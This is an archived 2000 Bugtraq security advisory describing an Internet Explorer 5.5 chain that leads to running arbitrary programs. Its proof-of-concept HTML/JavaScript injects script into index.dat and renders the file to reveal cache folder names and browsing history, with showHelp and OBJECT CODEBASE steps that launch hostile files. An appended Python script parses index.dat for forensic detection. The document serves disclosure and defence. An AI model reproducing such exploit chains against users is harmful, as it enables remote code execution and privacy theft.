Bugtraq mailing list archives
OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Thu, 23 Nov 2000 17:50:01 +0200
Georgi Guninski security advisory #29, 2000

OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5

Systems affected: IE 5.5, probably 5.x and Outlook/Outlook Express (not tested)
Risk: High
Date: 23 November 2000

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.

Announcement:
I have set up an experimental mailing list about client and web security - there you may learn faster about my discoveries and how to protect your clients. Check: http://www.guninski.com/mailinglist.html

Description:
Note: This is a completely different issue from Advisory #28, "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder", though both use some common stuff.

There is a security vulnerability in IE 5.5 (probably 5.x and Outlook) which allows executing arbitrary programs using OBJECT TYPE="text/html" and parsing index.dat, which reveals the location of the Temporary Internet Files folder. This may lead to taking full control over the user's computer.

Details:
Background: If one can inject a file on the user's local disk and know its location, it is possible to execute arbitrary programs in at least two ways:
1) window.showHelp("c:\\dir\\hostile.chm")
2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">
So the question arises how to inject a specified file on the user's disk.
A good way is to use the Temporary Internet Files folder, which contains cached documents and files. The problem with it is that there are several subfolders with random names. But there is a special file, "index.dat", which is something like a catalog or registry: it contains all visited URLs and, more importantly, the names of the random folders at its beginning. It is located in C:/WINDOWS/Temporary Internet Files/Content.IE5/ under Win9x and in C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet Files/Content.IE5/ under Win2K - so under Win2K the username of the current user must be known or guessed, which makes things more difficult.

It is possible to inject JavaScript into it by just doing:
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
because this URL shall be written in it. So if it can be parsed by IE and the JavaScript executed, the names of the random folders will be known. Microsoft tries to prevent parsing non-HTML files, and they issued a security bulletin in August:
http://www.microsoft.com/technet/security/bulletin/MS00-055.asp
But it is still possible to parse (render) non-HTML files in the following way:
<OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>

So the exploit scenario is:
1) Inject JavaScript into index.dat by window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>"). When index.dat is rendered, the JavaScript is executed in its context and has access to its content, which allows finding the random directory names.
2) Parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) After the Temporary Internet Files folders are known, inject for example .chm files by:
<OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
(IE caches it in one of the random folders, here as chm1[1].chm.)
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

The presence of the random Temporary Internet Files folder names in index.dat is very dangerous - it means that every Cross Frame Security vulnerability or vulnerability that reads local files may lead to executing arbitrary programs. This means that a lot of my previous vulnerabilities are much more serious than I had realized then.

The code is:
--------parsedat.html------------------------------------------------
This demo is for Windows 9x - you must modify the source for Win2K. You may need to wait a few minutes if you have a slow computer; with a Pentium 500 or better, or under Win2K, probably much less. A window with location "about:blank" is expected to open containing index.dat - the file where the random names of the Temporary Internet Files directories are kept (they are the random names at the beginning of the window) - and the list of all visited URLs, among other stuff. Once the Temporary Internet Files directories are known it is possible to execute arbitrary programs through cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a window with location "about:blank" and the content of index.dat, close IE and visit the page again.
<SCRIPT>
// Open a URL whose query string carries the payload; IE writes the full URL into index.dat.
// "</"+"SCRIPT>" is split so the outer <SCRIPT> block is not closed prematurely.
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
// Render index.dat as text/html; the injected script then runs and copies the file's content into a new window.
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
//s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K ------------ you must change "Administrator" to the actual user name
// Delay so the opened URL has been written to index.dat before it is rendered.
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------

Workaround:
Disable Active Scripting and move the Temporary Internet Files folder to an unpredictable location.

A demonstration which opens index.dat, which contains the Temporary Internet Files folder names and the list of all visited URLs, is available at:
http://www.guninski.com/parsedat.html

Vendor status:
Microsoft was contacted on 15 November 2000.

Check my experimental mailing list at:
http://www.guninski.com/mailinglist.html

Regards,
Georgi Guninski
http://www.guninski.com
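The whole chain above hinges on one fact: the random Content.IE5 folder names are stored in clear text near the start of index.dat, next to every visited URL. The following Python script is an added example, not part of Guninski's advisory or his demo page. It parses a Content.IE5 index.dat (the directory table in the header, then the URL records in the block area) and, as a forensic check, lists cached URLs whose query string carries HTML tags, which is exactly what the window.open("...?<SCRIPT>...") injection step leaves behind. The field offsets follow the publicly documented "Client UrlCache MMF Ver 5.2" layout and are an assumption of this example, not something the advisory states; the sample file is constructed in memory so the script runs offline.

```python
import struct

# Layout constants of the documented "Client UrlCache MMF Ver 5.2" format
# (assumption: taken from public format documentation, not from the advisory).
SIGNATURE = b"Client UrlCache MMF Ver 5.2\x00"
BLOCK_SIZE = 128          # the record area is allocated in 128-byte blocks
HEADER_SIZE = 0x4000      # header incl. directory table; records start here
DIR_TABLE_OFFSET = 0x48   # 32 entries of (uint32 file count, 8-char dir name)
DIR_TABLE_ENTRIES = 32
RECORD_TYPES = (b"URL ", b"REDR", b"LEAK", b"HASH")


def cache_directories(data):
    """Return [(dirname, cached_file_count), ...] from the header's directory table.

    These are the random Content.IE5 sub-folder names the advisory needs: they
    sit in plain ASCII in the first few hundred bytes of the file.
    """
    if not data.startswith(SIGNATURE):
        raise ValueError("not a Content.IE5 index.dat")
    dirs = []
    for i in range(DIR_TABLE_ENTRIES):
        count, name = struct.unpack_from("<I8s", data, DIR_TABLE_OFFSET + i * 12)
        name = name.rstrip(b"\x00")
        if not name:          # unused slots are zero-filled
            break
        dirs.append((name.decode("ascii"), count))
    return dirs


def _cstring(data, offset):
    return data[offset:data.index(b"\x00", offset)].decode("latin-1")


def url_records(data):
    """Walk the block area and yield (url, cache_dir, cached_filename) per URL record."""
    dirs = [name for name, _ in cache_directories(data)]
    pos = struct.unpack_from("<I", data, 0x20)[0]  # hash table offset: start of the block area
    while pos + 8 <= len(data):
        sig, nblocks = struct.unpack_from("<4sI", data, pos)
        if sig == b"URL ":
            loc_off = struct.unpack_from("<I", data, pos + 0x34)[0]   # URL string, relative to record
            dir_idx = data[pos + 0x38]                                 # index into directory table
            name_off = struct.unpack_from("<I", data, pos + 0x3C)[0]  # cached file name, relative
            url = _cstring(data, pos + loc_off)
            fname = _cstring(data, pos + name_off) if name_off else ""
            cache_dir = dirs[dir_idx] if dir_idx < len(dirs) else ""
            yield url, cache_dir, fname
        # Allocated records span nblocks blocks; anything else is stepped over one block at a time.
        pos += nblocks * BLOCK_SIZE if sig in RECORD_TYPES and nblocks else BLOCK_SIZE


def injected_markup_urls(data):
    """Forensic check: cached URLs whose text carries HTML tags. No legitimate
    navigation puts '<script' into a URL; finding it in index.dat is the footprint
    of the window.open("...?<SCRIPT>...") injection step described in the advisory."""
    return [url for url, _, _ in url_records(data)
            if "<script" in url.lower() or "<object" in url.lower()]


def build_sample():
    """Construct a minimal index.dat-shaped file (constructed test data, not a real
    cache): two cache directories and two URL records, the second carrying the
    advisory's script injection in its query string."""
    hdr = bytearray(HEADER_SIZE)
    hdr[:len(SIGNATURE)] = SIGNATURE
    struct.pack_into("<I", hdr, 0x20, HEADER_SIZE)
    for i, (name, count) in enumerate([("A1B2C3D4", 3), ("E5F6G7H8", 1)]):
        struct.pack_into("<I8s", hdr, DIR_TABLE_OFFSET + i * 12, count, name.encode("ascii"))
    records = bytearray()
    entries = [
        ("http://www.example.test/page.html", 0, "page[1].htm"),
        ("http://somehost/index.html?<SCRIPT>a=window.open()</SCRIPT>", 1, "index[1].htm"),
    ]
    for url, dir_idx, fname in entries:
        rec = bytearray(2 * BLOCK_SIZE)
        rec[:4] = b"URL "
        struct.pack_into("<I", rec, 4, 2)             # record length in blocks
        rec[0x38] = dir_idx                            # cache directory index
        loc_off = 0x68                                 # strings follow the fixed fields
        url_b = url.encode("ascii") + b"\x00"
        name_off = loc_off + len(url_b)
        rec[loc_off:loc_off + len(url_b)] = url_b
        rec[name_off:name_off + len(fname) + 1] = fname.encode("ascii") + b"\x00"
        struct.pack_into("<I", rec, 0x34, loc_off)
        struct.pack_into("<I", rec, 0x3C, name_off)
        records += rec
    struct.pack_into("<I", hdr, 0x1C, HEADER_SIZE + len(records))  # file size field
    return bytes(hdr + records)


if __name__ == "__main__":
    sample = build_sample()
    print("cache directories:", cache_directories(sample))
    for url, cache_dir, fname in url_records(sample):
        print(f"{cache_dir}\\{fname:<14} <- {url}")
    print("URLs carrying injected markup:", injected_markup_urls(sample))
```

Run against a real Content.IE5 index.dat (pass the file's bytes instead of the constructed sample) the directory list is the same information the advisory's injected script reads out of the rendered file, and the last function gives an incident responder a quick way to spot the injection step in a user's cache.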